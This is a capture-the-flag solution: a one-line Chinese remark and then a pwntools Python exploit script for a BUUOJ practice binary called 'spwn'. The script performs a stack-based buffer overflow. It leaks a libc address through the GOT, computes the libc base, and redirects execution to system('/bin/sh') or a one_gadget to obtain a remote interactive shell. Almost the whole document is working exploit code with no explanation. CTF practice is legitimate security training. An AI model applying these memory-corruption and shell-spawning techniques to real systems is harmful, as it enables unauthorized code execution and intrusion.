不好讲就是入群题
exp:
#! /usr/bin/python2
from pwn import *
from LibcSearcher import *
local=0
if local==1:
p=process('../binary/spwn')
elf=ELF('../binary/spwn')
libc=elf.libc
else:
p=remote('node3.buuoj.cn',29494)
elf=ELF('../binary/spwn')
libc=elf.libc
lg=lambda address,data:log.success('%s'%(address)+hex(data))
def exp():
main=0x08048513
p.recvuntil('?')
payload='a'*4
p.send(payload)
ret=0x08048512
p.recvuntil('say?')
payload1='a'*0x10+p32(1)+'2'*4+p32(20)+p32(main)
p.send(payload1)
p.recvuntil('name?')
p.send('bbbb'+p32(0)+p32(main))
p.recvuntil('say?')
payload2='b'*0x10+p32(elf.got['__libc_start_main'])+'2'*4+p32(0x804A300)+p32(0x080484BC)
p.send(payload2)
libc_main=u32(p.recvuntil('\xf7')[-4:])-247
libcbase=libc_main-libc.sym['__libc_start_main']
lg('libcbase: ',libcbase)
bin_sh=libcbase+libc.search('/bin/sh').next()
one_gadget=libcbase+0x3a80c
system=libcbase+libc.sym['system']
p.send(p32(bin_sh)+p32(one_gadget))
p.recvuntil('say?')
p.send('aa')
p.interactive()
if __name__=="__main__":
exp()
